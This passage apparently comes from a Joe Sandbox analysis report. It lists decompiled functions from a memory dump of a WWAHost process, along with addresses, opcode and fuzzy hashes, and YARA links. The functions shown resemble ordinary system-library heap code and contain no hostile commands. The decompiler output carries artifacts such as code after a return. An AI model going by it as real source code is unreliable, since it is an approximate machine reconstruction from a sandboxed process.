						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03982AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03966600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03982C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03982AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03982C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03982ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E039AD0D1(_t62);
				goto L28;
			}





















                                              0x03982990
                                              0x03982992
                                              0x03982997
                                              0x039829a3
                                              0x039829a6
                                              0x039829ab
                                              0x039829ad
                                              0x039829b2
                                              0x039c5c80
                                              0x039829b8
                                              0x039829b8
                                              0x039829bb
                                              0x039829c0
                                              0x039829c5
                                              0x039829c6
                                              0x039829c6
                                              0x039829cb
                                              0x00000000
                                              0x00000000
                                              0x039829cd
                                              0x039829d0
                                              0x039829d9
                                              0x039829db
                                              0x039829dd
                                              0x03982a7f
                                              0x03982a84
                                              0x03982a87
                                              0x03982a89
                                              0x039c5ca1
                                              0x039c5ca3
                                              0x00000000
                                              0x03982a8f
                                              0x03982a8f
                                              0x00000000
                                              0x03982a8f
                                              0x00000000
                                              0x039829e3
                                              0x039829e3
                                              0x039829e3
                                              0x00000000
                                              0x039829e3
                                              0x039829dd
                                              0x00000000
                                              0x039829db
                                              0x039829e6
                                              0x039829e9
                                              0x039829eb
                                              0x039829ed
                                              0x039829f3
                                              0x039829f5
                                              0x039829f8
                                              0x039829fa
                                              0x03982a97
                                              0x03982a9a
                                              0x03982a9d
                                              0x03982add
                                              0x00000000
                                              0x03982a9f
                                              0x03982aa2
                                              0x03982aa5
                                              0x03982aa8
                                              0x03982aab
                                              0x039c5cab
                                              0x039c5caf
                                              0x039c5cc5
                                              0x039c5cda
                                              0x039c5cdc
                                              0x039c5cdf
                                              0x039c5ce5
                                              0x00000000
                                              0x039c5ceb
                                              0x039c5ced
                                              0x039c5cee
                                              0x00000000
                                              0x039c5cee
                                              0x039c5cb1
                                              0x039c5cb4
                                              0x039c5cb9
                                              0x039c5cbb
                                              0x00000000
                                              0x039c5cbd
                                              0x039c5cbd
                                              0x00000000
                                              0x039c5cbd
                                              0x039c5cbb
                                              0x03982ab1
                                              0x03982ab1
                                              0x03982ac4
                                              0x03982ac6
                                              0x03982ac6
                                              0x00000000
                                              0x03982ac6
                                              0x03982aab
                                              0x00000000
                                              0x03982a00
                                              0x03982a09
                                              0x03982a0e
                                              0x03982a21
                                              0x03982a24
                                              0x03982a35
                                              0x03982a3a
                                              0x03982a3d
                                              0x03982a42
                                              0x03982a59
                                              0x03982a59
                                              0x03982a5c
                                              0x03982a5f
                                              0x03982a5f
                                              0x039829fa
                                              0x039829f3
                                              0x03982a64
                                              0x03982a64
                                              0x03982a6b
                                              0x03982a6b
                                              0x03982a6d
                                              0x03982a72
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db1d3c68b5e024a822822cfed78e0aef0c224b8434ed1f6678ecf94500003feb
                                              • Instruction ID: 62f1d7127991bd0e8141a45046ef4b21305e5d9ac1c36ce973fa190d42a5c23b
                                              • Opcode Fuzzy Hash: db1d3c68b5e024a822822cfed78e0aef0c224b8434ed1f6678ecf94500003feb
                                              • Instruction Fuzzy Hash: BC518975900209DFDF25EF95C980ADEBBB9BF88750F158859E850AB260C335DD52CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03984BAD Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E03984BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x3a4d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0395CC50(_t86);
					L11:
					return E0399B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3a48504
				E03972280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0399FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0399B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03974620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0395CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3a48504
								E0396FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03984F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                              0x03984bad
                                              0x03984bbf
                                              0x03984bc2
                                              0x03984bc6
                                              0x03984bcd
                                              0x03984bd9
                                              0x039c67fe
                                              0x039c6800
                                              0x03984ccc
                                              0x03984ccd
                                              0x03984cb7
                                              0x03984cc9
                                              0x03984cc9
                                              0x03984bdf
                                              0x03984be5
                                              0x00000000
                                              0x00000000
                                              0x03984beb
                                              0x03984bef
                                              0x00000000
                                              0x00000000
                                              0x03984bf5
                                              0x03984bf9
                                              0x03984c06
                                              0x03984c0b
                                              0x03984c17
                                              0x03984c1c
                                              0x03984c1f
                                              0x03984c25
                                              0x03984c33
                                              0x03984c3d
                                              0x03984c40
                                              0x03984c43
                                              0x03984c47
                                              0x03984c4d
                                              0x03984c53
                                              0x03984c54
                                              0x03984c55
                                              0x03984c56
                                              0x03984c5b
                                              0x03984c5c
                                              0x03984c63
                                              0x03984c6b
                                              0x00000000
                                              0x00000000
                                              0x039c6776
                                              0x039c6784
                                              0x039c6784
                                              0x039c679f
                                              0x039c67a7
                                              0x039c67af
                                              0x039c67ce
                                              0x00000000
                                              0x039c67b1
                                              0x039c67b7
                                              0x039c67b8
                                              0x039c67c1
                                              0x039c67d3
                                              0x039c67d9
                                              0x039c67dd
                                              0x03984c94
                                              0x03984c94
                                              0x03984c98
                                              0x03984c9c
                                              0x03984ca3
                                              0x039c67f4
                                              0x039c67f4
                                              0x03984cb5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03984cb5
                                              0x03984c79
                                              0x03984c7e
                                              0x03984c89
                                              0x03984c8b
                                              0x03984c8f
                                              0x03984c8f
                                              0x00000000
                                              0x03984c89
                                              0x039c67c3
                                              0x00000000
                                              0x039c67c3
                                              0x039c67af
                                              0x03984c73
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be5fea4905292fd4fb111e50de2fd8e98ae8f477151be1b92067b3f6110608ad
                                              • Instruction ID: a29ea567bc715679a7135ce45f5cd64f8116886337e6d16e863ceebc55bfd239
                                              • Opcode Fuzzy Hash: be5fea4905292fd4fb111e50de2fd8e98ae8f477151be1b92067b3f6110608ad
                                              • Instruction Fuzzy Hash: 9D41B635A003299BDF20EF69C940BEAB7BCEF85750F0504A9E908AB240D774DE85CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03984D3B Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E03984D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x3a4d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0399FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3a47bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0399B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03974620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0395CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0399B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0399F380(_t67 + 0xc, 0x3935138, 0x10) == 0) {
								 *0x3a460d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03984F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03984E70(0x3a486b0, 0x3985690, 0, 0) != 0) {
					_t46 = E0395CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                              0x03984d3b
                                              0x03984d4d
                                              0x03984d53
                                              0x03984d58
                                              0x03984d65
                                              0x03984d6c
                                              0x03984d71
                                              0x03984d77
                                              0x03984d7f
                                              0x03984d8c
                                              0x03984d8e
                                              0x03984dad
                                              0x03984db0
                                              0x03984db7
                                              0x03984db8
                                              0x03984db9
                                              0x03984dba
                                              0x03984dbb
                                              0x03984dc1
                                              0x03984dc8
                                              0x03984dcc
                                              0x03984dd5
                                              0x03984dde
                                              0x03984ddf
                                              0x03984de0
                                              0x03984de1
                                              0x03984de6
                                              0x03984de7
                                              0x03984de9
                                              0x03984df3
                                              0x00000000
                                              0x00000000
                                              0x039c6c7c
                                              0x039c6c8a
                                              0x039c6c8a
                                              0x039c6c9d
                                              0x039c6ca7
                                              0x039c6cac
                                              0x039c6cb2
                                              0x039c6cb9
                                              0x00000000
                                              0x039c6cbf
                                              0x039c6cbf
                                              0x00000000
                                              0x039c6cbf
                                              0x039c6cb9
                                              0x03984dfb
                                              0x039c6ccf
                                              0x039c6cd3
                                              0x03984e32
                                              0x03984e39
                                              0x039c6ce0
                                              0x039c6cf2
                                              0x039c6cf2
                                              0x039c6ce0
                                              0x03984e3f
                                              0x03984e41
                                              0x03984e51
                                              0x03984e51
                                              0x03984e03
                                              0x03984e03
                                              0x03984e09
                                              0x03984e0f
                                              0x03984e57
                                              0x00000000
                                              0x00000000
                                              0x03984e1b
                                              0x03984e30
                                              0x03984e5b
                                              0x03984e5b
                                              0x00000000
                                              0x03984e30
                                              0x03984e11
                                              0x03984e11
                                              0x03984e16
                                              0x00000000
                                              0x03984e16
                                              0x03984e01
                                              0x00000000
                                              0x03984e01
                                              0x03984da5
                                              0x039c6c6b
                                              0x00000000
                                              0x03984dab
                                              0x03984dab
                                              0x00000000
                                              0x03984dab

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c56ebe64aeda5536a2c11ef510cf1143bae06adf734b02805af8d6e2ebfbdb60
                                              • Instruction ID: bdef921717ad10cbff8f18d92fd3e966f46d46af4fa71f60225aab0b3aec74ea
                                              • Opcode Fuzzy Hash: c56ebe64aeda5536a2c11ef510cf1143bae06adf734b02805af8d6e2ebfbdb60
                                              • Instruction Fuzzy Hash: 0F41F275A40318AFEB31EF15CC80FAAB7ADEF85750F08049AE9459B281D774ED40CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03968A0A Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E03968A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x3a4d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0399B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0396E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3931180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03981DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03993C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03968999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                              0x03968a0a
                                              0x03968a1c
                                              0x03968a23
                                              0x03968a2e
                                              0x03968a30
                                              0x03968a36
                                              0x03968a3c
                                              0x03968a3e
                                              0x03968a4a
                                              0x03968a52
                                              0x03968a9c
                                              0x03968aae
                                              0x03968a58
                                              0x03968a5e
                                              0x03968a6a
                                              0x03968a6f
                                              0x03968a75
                                              0x03968a7d
                                              0x03968a85
                                              0x03968a86
                                              0x03968a89
                                              0x03968a93
                                              0x03968a99
                                              0x03968a9b
                                              0x00000000
                                              0x03968aaf
                                              0x03968abe
                                              0x03968ac3
                                              0x03968acb
                                              0x03968ad7
                                              0x03968ae0
                                              0x03968af1
                                              0x00000000
                                              0x03968af1
                                              0x03968acd
                                              0x03968ad5
                                              0x03968afb
                                              0x03968afd
                                              0x03968aff
                                              0x03968b07
                                              0x03968b22
                                              0x03968b24
                                              0x03968b2a
                                              0x03968b2e
                                              0x03968b3f
                                              0x03968b78
                                              0x03968b41
                                              0x03968b52
                                              0x03968b54
                                              0x03968b5c
                                              0x03968b74
                                              0x03968b74
                                              0x03968b5c
                                              0x03968b3f
                                              0x03968b5e
                                              0x03968b61
                                              0x03968b64
                                              0x03968b64
                                              0x03968b6c
                                              0x03968b6c
                                              0x03968b11
                                              0x039b9cd5
                                              0x039b9cd5
                                              0x03968b17
                                              0x03968b1a
                                              0x03968b1a
                                              0x00000000
                                              0x03968ad5
                                              0x03968a89

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0992f43a0a228fd0a8f6457a029eba29722c309ffe95c9d0f0d3be39e9d58c84
                                              • Instruction ID: ea5d660416212a1d177031d6ba1c4be34441f41d666018bd8a15fedddfa2cbea
                                              • Opcode Fuzzy Hash: 0992f43a0a228fd0a8f6457a029eba29722c309ffe95c9d0f0d3be39e9d58c84
                                              • Instruction Fuzzy Hash: 9D4170B5A4532D9BDF24DF69CC88AAAB3F8FB84340F1445EAD81997251E7709E80CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1AA16 Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03A1AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E03A1ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E03A1AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E03A1AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E039FCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L039777F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E03977D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E03A1131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E039FCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                              0x03a1aa1f
                                              0x03a1aa21
                                              0x03a1aa23
                                              0x03a1aa2b
                                              0x03a1aa30
                                              0x03a1aa36
                                              0x03a1aa39
                                              0x03a1aa42
                                              0x03a1aa75
                                              0x03a1aa7a
                                              0x03a1aa7c
                                              0x03a1aa7c
                                              0x03a1aa88
                                              0x03a1aa8a
                                              0x03a1aa8f
                                              0x03a1ab02
                                              0x03a1ab04
                                              0x03a1aa99
                                              0x03a1aaa8
                                              0x03a1aaaf
                                              0x03a1aab3
                                              0x03a1aacc
                                              0x03a1aad1
                                              0x03a1aad6
                                              0x03a1aae0
                                              0x03a1aaf3
                                              0x03a1aaf9
                                              0x03a1aafe
                                              0x03a1aafe
                                              0x03a1aaf3
                                              0x03a1aad6
                                              0x03a1aab3
                                              0x03a1ab07
                                              0x03a1ab0a
                                              0x03a1ab11
                                              0x03a1ab23
                                              0x03a1ab13
                                              0x03a1ab1c
                                              0x03a1ab1c
                                              0x03a1ab2b
                                              0x03a1ab44
                                              0x03a1ab44
                                              0x03a1ab51
                                              0x03a1ab51
                                              0x03a1aa44
                                              0x03a1aa47
                                              0x03a1aa4c
                                              0x00000000
                                              0x00000000
                                              0x03a1aa5a
                                              0x03a1aa64
                                              0x03a1aa72
                                              0x00000000
                                              0x03a1aa66
                                              0x03a1aa66
                                              0x03a1aa68
                                              0x03a1aa6a
                                              0x00000000
                                              0x03a1aa6a

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                              • Instruction ID: 7b5b8891c6bc1ce9e36c6fb0693b08725e0e096478cbb3b0e151ba45ac348c25
                                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                              • Instruction Fuzzy Hash: 2631E436F162846BDB15CBA9C945BBFF7BAEF84210F09806EE805AB391DA749D10C750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1FDE2 Relevance: .1, Instructions: 116COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E03A1FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E03A1FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E03A20A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03977D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E03A11608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E03A22B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E03A1C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E03A1DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
